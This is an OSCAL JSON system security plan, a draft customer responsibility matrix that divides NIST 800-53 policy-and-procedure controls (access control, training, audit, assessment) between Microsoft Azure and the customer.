{"system-security-plan":{"uuid":"e1503c26-7b31-42a5-87ba-624e9334106a","metadata":{"roles":[{"id":"system-owner","title":"The System Owner"},{"id":"cloud-service-provider","title":"The Cloud Service Provider","short-name":"CSP"},{"id":"customer","title":"The Customer"}],"title":"Azure + Dynamics 365 + Power Platform Customer Responsibility Matrix","parties":[{"name":"Microsoft","type":"organization","uuid":"bf0672d8-1ac0-484f-a49e-79cc6347bdb7"},{"name":"The Customer","type":"organization","uuid":"d4ac8d4f-fa39-497e-b54b-38c22bdf2429"}],"version":"DRAFT","document-ids":[{"scheme":"http://oscal.io/oscal/identifier/content-uuid","identifier":"0ada35e6-ddf6-41df-bc8e-a630fd5dd483"}],"last-modified":"2026-05-26T16:49:11Z","oscal-version":"1.2.2"},"import-profile":{"href":"#21f7e477-4aea-432c-95e0-65b678ecdc89"},"system-characteristics":{"status":{"state":"other"},"system-ids":[{"id":"8ad7dd1c-6c64-4cf8-a488-6e7a118e1650","identifier-type":"https://ietf.org/rfc/rfc4122"},{"id":"F1603087869","identifier-type":"http://fedramp.gov"}],"description":"","system-name":"Azure","system-information":{"information-types":[{"uuid":"472ff18d-01d5-45cc-9e16-32092c39bea7","title":"None","description":"Placeholder"}]},"authorization-boundary":{"description":""},"security-sensitivity-level":"[not-specified]"},"system-implementation":{"users":[{"uuid":"ecc8e51e-56d1-4961-b4f2-cdcb90f4a9c1","props":[{"name":"type","value":"internal"}],"title":"System Owner","role-ids":["system-owner"]}],"components":[{"type":"this-system","uuid":"cd1570e8-b600-426d-a87a-845c47aa13a5","title":"This System","status":{"state":"operational"},"description":""}]},"control-implementation":{"description":"","implemented-requirements":[{"uuid":"a2a96655-b335-48f5-b96d-f27f3f17b00d","props":[{"ns":"https://csrc.nist.gov/ns/800-53/rev5","name":"category","value":"security"},{"ns":"https://csrc.nist.gov/ns/800-53/rev5","name":"activity-type","value":"technical"}],"control-id":"ac-1","statements":[{"uuid":"e9387127-bbf3-4231-b621-a942fead0258","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"AC-01-001"},{"name":"control-origination","value":"organization"},{"name":"control-origination","value":"system-specific"},{"name":"control-origination","value":"customer-configured"}],"statement-id":"ac-1_smt.a","by-components":[{"uuid":"969a8e52-3317-493d-9f8b-eda83696d6d4","export":{"provided":[{"uuid":"acfc2a6d-8e2e-46fb-bc7c-a535f18a31e5","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"AC-01-001"}],"description":"Azure addresses the access control policy as part of the Microsoft security policies, of which there are two sets: the Microsoft Security Policy (MSP) that is applicable to all Microsoft personnel, and the Microsoft Security Program Policy (MSPP), which is applicable to all Microsoft personnel that have a responsibility for security. The Microsoft Information Risk Management Council (IRMC) is the governance body with review and approval responsibility for the MSP and MSPP. Within Azure, the MSPP specifically applies to all Microsoft personnel with security objectives such as designing, building, and operating Azure and across all information and processes used in the conduct of Microsoft business. All Azure personnel are accountable and responsible for complying with these guiding principles within their designated roles. The policy addresses the following: * Access control * Segregation of duties Additionally, the policy addresses the purpose, scope, roles, responsibilities, compliance requirements, and required coordination among the various Microsoft organizations that provide some level of support to all services. The policies indicate Microsoft management's commitment and are a component of the risk management strategy which provides Azure personnel with a current set of clear and concise information security requirements. The MSP is available to all Microsoft personnel on the Microsoft Policy website on the Microsoft intranet, and the MSPP and Security Standards are available through the Liquid tool, also on the Microsoft intranet. Service teams may supplement the Azure policies and procedures with offering-specific policies and procedures. Service-team-specific policies and procedures associated with access control are documented and stored within internal Azure SharePoint sites. Only personnel with authorized credentials, adequate levels of permission, legitimate need to know, and specific roles and responsibilities are given access to the service-team-specific policies or procedures. \nThe Azure Access Control Standard Operating Procedure (SOP) implements the access control policy and associated controls and documents the following procedures: * Provisioning of Access * Modification and Review of Access Rights * Privilege Management * Inactive User Account Review * Separation of Duties * Remote Access Mechanisms * Session Control Parameters Service teams may supplement the Azure policies and procedures with offering-specific policies and procedures. Service-team-specific policies and procedures associated with access control are documented and stored within internal Azure SharePoint sites. Only personnel with authorized credentials, adequate levels of permission, legitimate need to know, and specific roles and responsibilities are given access to the service-team-specific policies or procedures."}],"responsibilities":[{"uuid":"8bba1e43-bd13-4a90-abe8-5ff3e01470bb","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"AC-01-001"}],"description":"The customer is responsible for developing, documenting, and disseminating access control policy and procedures that addresses purpose, scope, roles, responsibilities, management commitment, coordination among organizational entities, and compliance; and is consistent with applicable laws, executive orders, directives, regulations, policies, standards, and guidelines. \nThe customer is responsible for procedures to facilitate the implementation of the access control policy and procedures and the associated access controls.","provided-uuid":"acfc2a6d-8e2e-46fb-bc7c-a535f18a31e5"}]},"description":"See inheritance and customer responsibility statements.","component-uuid":"cd1570e8-b600-426d-a87a-845c47aa13a5","responsible-roles":[{"role-id":"cloud-service-provider","party-uuids":["bf0672d8-1ac0-484f-a49e-79cc6347bdb7"]},{"role-id":"customer","party-uuids":["d4ac8d4f-fa39-497e-b54b-38c22bdf2429"]}]}]},{"uuid":"4c04655a-7575-4b9d-b54d-1c19d7bf830e","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"AC-01-003"},{"name":"control-origination","value":"organization"},{"name":"control-origination","value":"system-specific"},{"name":"control-origination","value":"customer-configured"}],"statement-id":"ac-1_smt.b","by-components":[{"uuid":"52748d3a-78a6-41d5-a6b4-7ced56e3ee6f","export":{"provided":[{"uuid":"7e47de7a-8431-4cf0-8293-427690e85bd4","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"AC-01-003"}],"description":"The Microsoft Information Risk Management Council (IRMC) organization is the governance body with approval responsibility for the Microsoft Security Policy (MSP) and Microsoft Security Program Policy (MSPP). The IRMC consists of representatives from security and risk management teams across Microsoft including Core Services Engineering and Operations (CSEO), Azure, and Global Security. The Customer Security and Trust: Security Engineering (CST-SE) organization manages the review and approval process and maintains the policies._x000D_ _x000D_ On an annual basis, the CST-SE conducts a line-by-line review of the MSP and MSPP. The Microsoft Security Policy Governance SOP describes each member's role, types and frequency of review, escalation paths, approval process, and formal publishing procedures of the security policy. Throughout the year, if necessary, CST-SE may convene with the IRMC to conduct reviews after a significant review or change request. The approved policy update is published within the relevant tool on the Microsoft intranet. If service teams establish service-specific or team-specific policies, the respective service teams update the necessary policies at least annually._x000D_ _x000D_ _x000D_ The Azure SOP team updates the Azure SOPs at least annually through a formal review process. If needed, the Azure SOP team makes updates after a significant change affecting policy or procedure execution as well. Certain service teams may also establish their own procedures, SOPs, or runbooks. If established, service-team-specific procedures are reviewed and updated by their respective teams as needed._x000D_ _x000D_"}],"responsibilities":[{"uuid":"b356504a-e07b-43a9-a480-16f03b1a6478","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"AC-01-003"}],"description":"The customer is responsible for reviewing and updating access control policies and procedures in accordance with FedRAMP requirements.","provided-uuid":"7e47de7a-8431-4cf0-8293-427690e85bd4"}]},"description":"See inheritance and customer responsibility statements.","component-uuid":"cd1570e8-b600-426d-a87a-845c47aa13a5","responsible-roles":[{"role-id":"cloud-service-provider","party-uuids":["bf0672d8-1ac0-484f-a49e-79cc6347bdb7"]},{"role-id":"customer","party-uuids":["d4ac8d4f-fa39-497e-b54b-38c22bdf2429"]}]}]},{"uuid":"d7d272d0-4ba2-4356-9f6d-7b6c95984ade","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"AC-01-004"},{"name":"control-origination","value":"organization"},{"name":"control-origination","value":"system-specific"},{"name":"control-origination","value":"customer-provided"}],"statement-id":"ac-1_smt.c","by-components":[{"uuid":"2cd6efed-2cb2-4c17-a771-7cea0b6cfafa","export":{"provided":[{"uuid":"0f0bbde7-cd0e-4373-b3b5-2c643d30108b","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"AC-01-004"}],"description":"The Azure team updates the Azure SOPs at least annually through a formal review process. If needed, the Azure team updates the SOP after a significant change affecting policy execution as well. If established, service-team-specific procedures are updated by their respective teams. The individual service teams review and update their respective SOPs at least annually and when required by a significant change."}],"responsibilities":[{"uuid":"dd4d7ac9-569a-44c8-a910-654a158d70c8","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"AC-01-004"}],"description":"The customer is responsible for reviewing and updating the current access control policy on a regular basis and following organization defined events.","provided-uuid":"0f0bbde7-cd0e-4373-b3b5-2c643d30108b"}]},"description":"See inheritance and customer responsibility statements.","component-uuid":"cd1570e8-b600-426d-a87a-845c47aa13a5","responsible-roles":[{"role-id":"cloud-service-provider","party-uuids":["bf0672d8-1ac0-484f-a49e-79cc6347bdb7"]},{"role-id":"customer","party-uuids":["d4ac8d4f-fa39-497e-b54b-38c22bdf2429"]}]}]}]},{"uuid":"a2062522-36d1-4491-b69c-17e776e0fd73","props":[{"ns":"https://csrc.nist.gov/ns/800-53/rev5","name":"category","value":"security"},{"ns":"https://csrc.nist.gov/ns/800-53/rev5","name":"activity-type","value":"operational"}],"control-id":"at-1","statements":[{"uuid":"dfd7ab36-7a48-4c36-a422-e8400dfbee41","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"AT-02-001"},{"name":"control-origination","value":"organization"},{"name":"control-origination","value":"system-specific"},{"name":"control-origination","value":"customer-configured"}],"statement-id":"at-1_smt.a","by-components":[{"uuid":"e6d7daef-4228-4543-836a-fe46a6f2137b","export":{"provided":[{"uuid":"551ec9d1-b76b-4e07-97bd-ef4f8466a9c7","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"AT-02-001"}],"description":"Azure addresses the awareness and training policy as part of the Microsoft security policies, of which there are two sets: the Microsoft Security Policy (MSP) that is applicable to all Microsoft personnel, and the Microsoft Security Program Policy (MSPP), which is applicable to all Microsoft personnel that have a responsibility for security. The Microsoft Information Risk Management Council (IRMC) is the governance body with review and approval responsibility for the MSP and MSPP. Within Azure, the MSPP specifically applies to all Microsoft personnel with security objectives such as designing, building, and operating Azure and across all information and processes used in the conduct of Microsoft business. All Azure personnel are accountable and responsible for complying with these guiding principles within their designated roles. The policy addresses the following: * Security training Additionally, the policy addresses the purpose, scope, roles, responsibilities, compliance requirements, and required coordination among the various Microsoft organizations that provide some level of support to all services. The policies indicate Microsoft management's commitment and are a component of the risk management strategy which provides Azure personnel with a current set of clear and concise information security requirements. The MSP is available to all Microsoft personnel on the Microsoft Policy website on the Microsoft intranet, and the MSPP and Security Standards are available through the Liquid tool, also on the Microsoft intranet. The Azure SOPs are stored in the Azure Security, Privacy & Compliance SharePoint site. This SharePoint site is accessible to all Azure personnel. Service teams may supplement the Azure policies and procedures with offering-specific policies and procedures. Service-team-specific policies and procedures associated with awareness and training are documented and stored within internal Azure SharePoint sites. Only personnel with authorized credentials, adequate levels of permission, legitimate need to know, and specific roles and responsibilities are given access to the service-team-specific policies or procedures. \nThe Azure Security Education and Awareness Standard Operating Procedure (SOP) implements the awareness and training policy and associated controls and documents the following procedures: * Development of a program that requires all personnel to take the required training and any additional training based on individual job requirements * Educating personnel about specific procedures and topics related to their job function that support maintaining the confidentiality, integrity, and availability of Azure and its services * Standard approach, tools, and techniques used to implement and sustain the awareness program Service teams may supplement the Azure policies and procedures with offering-specific policies and procedures. Service-team-specific policies and procedures associated with awareness and training are documented and stored within internal Azure SharePoint sites. Only personnel with authorized credentials, adequate levels of permission, legitimate need to know, and specific roles and responsibilities are given access to the service-team-specific policies or procedures."}],"responsibilities":[{"uuid":"c1f8500d-15fa-489d-97b5-502727ce81d5","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"AT-02-001"}],"description":"The customer is responsible for developing, documenting, and disseminating awareness training policy and procedures that addresses purpose, scope, roles, responsibilities, management commitment, coordination among organizational entities, and compliance; and is consistent with applicable laws, executive orders, directives, regulations, policies, standards, and guidelines. \nThe customer is responsible for procedures to facilitate the implementation of the awareness and training policy and the associated awareness and training controls.","provided-uuid":"551ec9d1-b76b-4e07-97bd-ef4f8466a9c7"}]},"description":"See inheritance and customer responsibility statements.","component-uuid":"cd1570e8-b600-426d-a87a-845c47aa13a5","responsible-roles":[{"role-id":"cloud-service-provider","party-uuids":["bf0672d8-1ac0-484f-a49e-79cc6347bdb7"]},{"role-id":"customer","party-uuids":["d4ac8d4f-fa39-497e-b54b-38c22bdf2429"]}]}]},{"uuid":"75e8abec-b5a0-4263-84e7-d7eb773c05a6","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"AT-02-003"},{"name":"control-origination","value":"organization"},{"name":"control-origination","value":"system-specific"},{"name":"control-origination","value":"customer-configured"}],"statement-id":"at-1_smt.b","by-components":[{"uuid":"eec4dd21-1e05-47d9-854f-3eafee21937e","export":{"provided":[{"uuid":"dc114415-0c0c-47d8-a86d-7865273f96f7","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"AT-02-003"}],"description":"The Microsoft Information Risk Management Council (IRMC) organization is the governance body with approval responsibility for the Microsoft Security Policy (MSP) and Microsoft Security Program Policy (MSPP). The IRMC consists of representatives from security and risk management teams across Microsoft including Core Services Engineering and Operations (CSEO), Azure, and Global Security. The Customer Security Policy and Assurance (CSPA) organization manages the review and approval process and maintains the policies. On an annual basis, the CST-SE conducts a line-by-line review of the MSP and MSPP. The Microsoft Security Policy (MSP) and Microsoft Security Program Policy (MSPP) Governance document describes each member's role, types and frequency of review, escalation paths, approval process, and formal publishing procedures of the security policy. Throughout the year, if necessary, CST-SE may convene with the IRMC to conduct reviews after a significant review or change request. The approved policy update is published within the relevant tool on the Microsoft intranet. If service teams establish service-specific or team-specific policies, the respective service teams update the necessary policies at least annually."}],"responsibilities":[{"uuid":"ce6e7948-9527-4092-a6c7-319a1b41eb22","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"AT-02-003"}],"description":"The customer is responsible for procedures to facilitate the implementation of the awareness and training policy and the associated awareness and training controls.","provided-uuid":"dc114415-0c0c-47d8-a86d-7865273f96f7"}]},"description":"See inheritance and customer responsibility statements.","component-uuid":"cd1570e8-b600-426d-a87a-845c47aa13a5","responsible-roles":[{"role-id":"cloud-service-provider","party-uuids":["bf0672d8-1ac0-484f-a49e-79cc6347bdb7"]},{"role-id":"customer","party-uuids":["d4ac8d4f-fa39-497e-b54b-38c22bdf2429"]}]}]},{"uuid":"31f67fc7-c66f-4462-b3eb-8a7f909abe25","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"AT-02-004"},{"name":"control-origination","value":"organization"},{"name":"control-origination","value":"system-specific"},{"name":"control-origination","value":"customer-configured"}],"statement-id":"at-1_smt.c","by-components":[{"uuid":"e5bff266-dee8-46a1-90ca-e27046f8ac5e","export":{"provided":[{"uuid":"6db5bba1-f9a0-47c6-9f9f-59e84f21b814","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"AT-02-004"}],"description":"The Azure team updates the Azure SOPs at least annually through a formal review process. If needed, the Azure team updates the SOP after a significant change affecting policy execution as well. If established, service-team-specific procedures are updated by their respective teams. The individual service teams review and update their respective SOPs at least annually and when required by a significant change."}],"responsibilities":[{"uuid":"1350647f-a375-48a9-b6e4-a3d5358c5a53","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"AT-02-004"}],"description":"The customer is responsible for reviewing and updating the current awareness and training policy on a regular basis and following organization-defined events.","provided-uuid":"6db5bba1-f9a0-47c6-9f9f-59e84f21b814"}]},"description":"See inheritance and customer responsibility statements.","component-uuid":"cd1570e8-b600-426d-a87a-845c47aa13a5","responsible-roles":[{"role-id":"cloud-service-provider","party-uuids":["bf0672d8-1ac0-484f-a49e-79cc6347bdb7"]},{"role-id":"customer","party-uuids":["d4ac8d4f-fa39-497e-b54b-38c22bdf2429"]}]}]}]},{"uuid":"bc7aab10-c845-43ec-b570-21689f736451","props":[{"ns":"https://csrc.nist.gov/ns/800-53/rev5","name":"category","value":"security"},{"ns":"https://csrc.nist.gov/ns/800-53/rev5","name":"activity-type","value":"technical"}],"control-id":"au-1","statements":[{"uuid":"0b7b9367-fee7-4c99-905b-ac46299803a5","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"AU-03-001"},{"name":"control-origination","value":"organization"},{"name":"control-origination","value":"system-specific"},{"name":"control-origination","value":"customer-configured"}],"statement-id":"au-1_smt.a","by-components":[{"uuid":"206980e5-d49e-4218-bc1e-7821bd7970dd","export":{"provided":[{"uuid":"3804ef48-3d7c-47cd-b064-e5e723e0f789","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"AU-03-001"}],"description":"Azure addresses the audit and accountability policy as part of the Microsoft security policies, of which there are two sets: the Microsoft Security Policy (MSP) that is applicable to all Microsoft personnel, and the Microsoft Security Program Policy (MSPP), which is applicable to all per that have a responsibility for security. The Microsoft Information Risk Management Council (IRMC) is the governance body with review and approval responsibility for the MSP and MSPP. Within Azure, the MSPP specifically applies to all Microsoft personnel with security objectives such as designing, building, and operating Azure and across all information and processes used in the conduct of Microsoft business. All Azure personnel are accountable and responsible for complying with these guiding principles within their designated roles. The policy addresses the following: * Security logging, monitoring, and reporting Additionally, the policy addresses the purpose, scope, roles, responsibilities, compliance requirements, and required coordination among the various Microsoft organizations that provide some level of support to all services. The policies indicate Microsoft management's commitment and are a component of the risk management strategy which provides Azure personnel with a current set of clear and concise information security requirements. The Azure Logging and Monitoring Standard Operating Procedure (SOP) implements the audit and accountability policy and associated controls and documents the following procedures: * Security monitoring * Protection of log information * Log retention * Near-real time alerting The MSP is available to all Microsoft personnel on the Microsoft Policy website on the Microsoft intranet, and the MSPP and Security Standards are available through the Liquid tool, also on the Microsoft intranet. The Azure SOPs are stored in the Azure Security, Privacy & Compliance SharePoint site. This SharePoint site is accessible to all Azure personnel. Service teams may supplement the Azure policies and procedures with offering-specific policies and procedures. Service-team-specific policies and procedures associated with audit and accountability are documented and stored within internal Azure SharePoint sites. Only personnel with authorized credentials, adequate levels of permission, legitimate need to know, and specific roles and responsibilities are given access to the service-team-specific policies or procedures. \nThe Azure Logging and Monitoring SOP implements the audit and accountability policy and associated controls and documents the following procedures: * Security monitoring * Protection of log information * Log retention * Near-real time alerting Service teams may supplement the Azure policies and procedures with offering-specific policies and procedures. Service-team-specific policies and procedures associated with audit and accountability are documented and stored within internal Azure SharePoint sites. Only personnel with authorized credentials, adequate levels of permission, legitimate need to know, and specific roles and responsibilities are given access to the service-team-specific policies or procedures."}],"responsibilities":[{"uuid":"78190209-e486-43c9-8f74-c04b0cc8f0f6","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"AU-03-001"}],"description":"The customer is responsible for developing, documenting and disseminating audit and accountability policy and procedures that addresses purpose, scope, roles, responsibilities, management commitment, coordination among organizational entities, and compliance; and is consistent with applicable laws, executive orders, directives, regulations, policies, standards, and guidelines. \nThe customer is responsible for procedures to facilitate the implementation of the audit and accountability policy and the associated audit and accountability controls.","provided-uuid":"3804ef48-3d7c-47cd-b064-e5e723e0f789"}]},"description":"See inheritance and customer responsibility statements.","component-uuid":"cd1570e8-b600-426d-a87a-845c47aa13a5","responsible-roles":[{"role-id":"cloud-service-provider","party-uuids":["bf0672d8-1ac0-484f-a49e-79cc6347bdb7"]},{"role-id":"customer","party-uuids":["d4ac8d4f-fa39-497e-b54b-38c22bdf2429"]}]}]},{"uuid":"172b3e3e-53e0-4753-867d-ac23feef9db3","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"AU-03-003"},{"name":"control-origination","value":"organization"},{"name":"control-origination","value":"system-specific"},{"name":"control-origination","value":"customer-configured"}],"statement-id":"au-1_smt.b","by-components":[{"uuid":"4be83177-8139-43f2-8a48-7420405ab4c7","export":{"provided":[{"uuid":"06df74cf-61a7-43c1-a345-c5ad7af0d2eb","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"AU-03-003"}],"description":"The Azure Logging and Monitoring SOP implements the audit and accountability policy and associated controls and documents the following procedures: * Security monitoring * Protection of log information * Log retention * Near-real time alerting Service teams may supplement the Azure policies and procedures with offering-specific policies and procedures. Service-team-specific policies and procedures associated with audit and accountability are documented and stored within internal Azure SharePoint sites. Only personnel with authorized credentials, adequate levels of permission, legitimate need to know, and specific roles and responsibilities are given access to the service-team-specific policies or procedures."}],"responsibilities":[{"uuid":"a0f9ce9e-3309-4a55-a8f4-afbee998478a","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"AU-03-003"}],"description":"The customer is responsible for procedures to facilitate the implementation of the audit and accountability policy and the associated audit and accountability controls.","provided-uuid":"06df74cf-61a7-43c1-a345-c5ad7af0d2eb"}]},"description":"See inheritance and customer responsibility statements.","component-uuid":"cd1570e8-b600-426d-a87a-845c47aa13a5","responsible-roles":[{"role-id":"cloud-service-provider","party-uuids":["bf0672d8-1ac0-484f-a49e-79cc6347bdb7"]},{"role-id":"customer","party-uuids":["d4ac8d4f-fa39-497e-b54b-38c22bdf2429"]}]}]},{"uuid":"a1e18a3e-e77f-426c-8391-50821afeed9e","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"AU-03-004"},{"name":"control-origination","value":"organization"},{"name":"control-origination","value":"system-specific"},{"name":"control-origination","value":"customer-configured"}],"statement-id":"au-1_smt.c","by-components":[{"uuid":"7cb1089d-5ab2-4204-a52b-841e314ee008","export":{"provided":[{"uuid":"af727fb4-e833-4609-bd49-a90900fe386a","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"AU-03-004"}],"description":"The Azure team updates the Azure SOPs at least annually through a formal review process. If needed, the Azure team updates the SOP after a significant change affecting policy execution as well. If established, service-team-specific procedures are updated by their respective teams. The individual service teams review and update their respective SOPs at least annually and when required by a significant change. The Azure team updates the Azure SOPs at least annually through a formal review process. If needed, the Azure team updates the SOP after a significant change affecting policy execution as well. If established, service-team-specific procedures are updated by their respective teams. The individual service teams review and update their respective SOPs at least annually and when required by a significant change."}],"responsibilities":[{"uuid":"2221446b-ed78-4b0d-bdaa-5ec0b6cb4c3e","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"AU-03-004"}],"description":"The customer is responsible for reviewing and updating the current audit and accountability policy on a regular basis and following organization defined events. The customer is responsible for reviewing and updating the current audit and accountability procedures on a regular basis and following organization defined events.","provided-uuid":"af727fb4-e833-4609-bd49-a90900fe386a"}]},"description":"See inheritance and customer responsibility statements.","component-uuid":"cd1570e8-b600-426d-a87a-845c47aa13a5","responsible-roles":[{"role-id":"cloud-service-provider","party-uuids":["bf0672d8-1ac0-484f-a49e-79cc6347bdb7"]},{"role-id":"customer","party-uuids":["d4ac8d4f-fa39-497e-b54b-38c22bdf2429"]}]}]}]},{"uuid":"32f1cc07-95b5-4bb1-a3c8-eb968c855987","props":[{"ns":"https://csrc.nist.gov/ns/800-53/rev5","name":"category","value":"security"},{"ns":"https://csrc.nist.gov/ns/800-53/rev5","name":"activity-type","value":"management"}],"control-id":"ca-1","statements":[{"uuid":"b7f64bb4-36a4-4974-b10f-8227fe5101d7","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"CA-04-001"},{"name":"control-origination","value":"organization"},{"name":"control-origination","value":"system-specific"},{"name":"control-origination","value":"customer-configured"}],"statement-id":"ca-1_smt.a","by-components":[{"uuid":"5247e45b-3274-4a4d-b192-c8e947c4f9c5","export":{"provided":[{"uuid":"1add00e3-4651-4547-9d51-f25109625a51","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"CA-04-001"}],"description":"Azure addresses the security assessment and authorization policy as part of the Microsoft security policies, of which there are two sets: the Microsoft Security Policy (MSP) that is applicable to all Microsoft personnel, and the Microsoft Security Program Policy (MSPP), which is applicable to all Microsoft personnel that have a responsibility for security. The Microsoft Information Risk Management Council (IRMC) is the governance body with review and approval responsibility for the MSP and MSPP. Within Azure, the MSPP specifically applies to all Microsoft personnel with security objectives such as, designing, building, and operating Azure and across all information and processes used in the conduct of Microsoft business . All Azure personnel are accountable and responsible for complying with these guiding principles within their designated roles. The policy addresses the following: * Compliance framework management * Organizational risk assessment * Information security coordination * Information security accountability Additionally, the policy addresses the purpose, scope, roles, responsibilities, compliance requirements, and required coordination among the various Microsoft organizations that provide some level of support to all services. The policies indicate Microsoft management's commitment and are a component of the risk management strategy which provides Azure personnel with a current set of clear and concise information security requirements. The MSP is available to all Microsoft personnel on the Microsoft Policy website on the Microsoft intranet, and the MSPP and Security Standards are available through the Liquid tool, also on the Microsoft intranet. The Azure SOPs are stored in the Azure Security, Privacy & Compliance SharePoint site. This SharePoint site is accessible to all Azure personnel. Service teams may supplement the Azure policies and procedures with offering-specific policies and procedures. Service-team-specific policies and procedures associated with security assessment and authorization are documented and stored within internal Azure SharePoint sites. Only personnel with authorized credentials, adequate levels of permission, legitimate need to know, and specific roles and responsibilities are given access to the service-team-specific policies or procedures. \nThe Azure Security Assessment and Authorization Standard Operating Procedure (SOP) implements the security assessment and authorization policy and associated controls and documents the following procedures: * Security assessments * Plan of action and milestones * Security authorization * Continuous monitoring Service teams may supplement the Azure policies and procedures with offering-specific policies and procedures. Service-team-specific policies and procedures associated with security assessment and authorization are documented and stored within internal Azure SharePoint sites. Only personnel with authorized credentials, adequate levels of permission, legitimate need to know, and specific roles and responsibilities are given access to the service-team-specific policies or procedures."}],"responsibilities":[{"uuid":"a7754b60-89df-49aa-b9c8-b414a086a894","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"CA-04-001"}],"description":"The customer is responsible for developing, documenting, and disseminating assessment, authorization, and monitoring policy and procedures that addresses purpose, scope, roles, responsibilities, management commitment, coordination among organizational entities, and compliance; and is consistent with applicable laws, executive orders, directives, regulations, policies, standards, and guidelines. \nThe customer is responsible for procedures to facilitate the implementation of the assessment, authorization, and monitoring policy and the associated assessment, authorization, and monitoring controls.","provided-uuid":"1add00e3-4651-4547-9d51-f25109625a51"}]},"description":"See inheritance and customer responsibility statements.","component-uuid":"cd1570e8-b600-426d-a87a-845c47aa13a5","responsible-roles":[{"role-id":"cloud-service-provider","party-uuids":["bf0672d8-1ac0-484f-a49e-79cc6347bdb7"]},{"role-id":"customer","party-uuids":["d4ac8d4f-fa39-497e-b54b-38c22bdf2429"]}]}]},{"uuid":"6b3448f7-0ab2-4aaf-bc5f-9626c10f7dd5","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"CA-04-003"},{"name":"control-origination","value":"organization"},{"name":"control-origination","value":"system-specific"},{"name":"control-origination","value":"customer-configured"}],"statement-id":"ca-1_smt.b","by-components":[{"uuid":"41293576-165b-46b2-9cb2-676011f5b101","export":{"provided":[{"uuid":"c0815e91-ac8c-47a1-8cb8-b4008b21667f","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"CA-04-003"}],"description":"The Microsoft Information Risk Management Council (IRMC) organization is the governance body with approval responsibility for the Microsoft Security Policy (MSP) and Microsoft Security Program Policy (MSPP). The IRMC consists of representatives from security and risk management teams across Microsoft including Core Services Engineering and Operations (CSEO), Azure, and Global Security. The Customer Security and Trust: Security Engineering (CST-SE) organization manages the review and approval process and maintains the policies. On an annual basis, the CST-SE conducts a line-by-line review of the MSP and MSPP. The Microsoft Security Policy (MSP) and Microsoft Security Program Policy (MSPP) Governance document describes each member's role, types and frequency of review, escalation paths, approval process, and formal publishing procedures of the security policy. Throughout the year, if necessary, CST-SE may convene with the IRMC to conduct reviews after a significant review or change request. The approved policy update is published within the relevant tool on the Microsoft intranet. If service teams establish service-specific or team-specific policies, the respective service teams update the necessary policies at least annually."}],"responsibilities":[{"uuid":"a4f975ef-22fb-401f-a81b-273d0f3fe3b8","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"CA-04-003"}],"description":"The customer is responsible for designating an official to manage the development, documentation, and dissemination of the assessment, authorization, and monitoring policy and procedures.","provided-uuid":"c0815e91-ac8c-47a1-8cb8-b4008b21667f"}]},"description":"See inheritance and customer responsibility statements.","component-uuid":"cd1570e8-b600-426d-a87a-845c47aa13a5","responsible-roles":[{"role-id":"cloud-service-provider","party-uuids":["bf0672d8-1ac0-484f-a49e-79cc6347bdb7"]},{"role-id":"customer","party-uuids":["d4ac8d4f-fa39-497e-b54b-38c22bdf2429"]}]}]},{"uuid":"32242cd4-a397-4e16-b0b0-4b1570fc513a","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"CA-04-004"},{"name":"control-origination","value":"organization"},{"name":"control-origination","value":"system-specific"},{"name":"control-origination","value":"customer-configured"}],"statement-id":"ca-1_smt.c","by-components":[{"uuid":"add01ee3-a46a-4e2e-93bd-8801c5dde460","export":{"provided":[{"uuid":"7d03beb6-d073-45c1-a8c0-ab0cd424cb61","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"CA-04-004"}],"description":"The Azure team updates the Azure SOPs at least annually through a formal review process. If needed, the Azure team updates the SOP after a significant change affecting policy execution as well. If established, service-team-specific procedures are updated by their respective teams. The individual service teams review and update their respective SOPs at least annually and when required by a significant change."}],"responsibilities":[{"uuid":"3792a95a-fcbe-423a-9356-43bef450013a","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"CA-04-004"}],"description":"The customer is responsible for reviewing and updating the current assessment, authorization, and monitoring policy on a regular basis and following organization defined events. The customer is responsible for reviewing and updating the current assessment, authorization, and monitoring procedures on a regular basis and following organization defined events.","provided-uuid":"7d03beb6-d073-45c1-a8c0-ab0cd424cb61"}]},"description":"See inheritance and customer responsibility 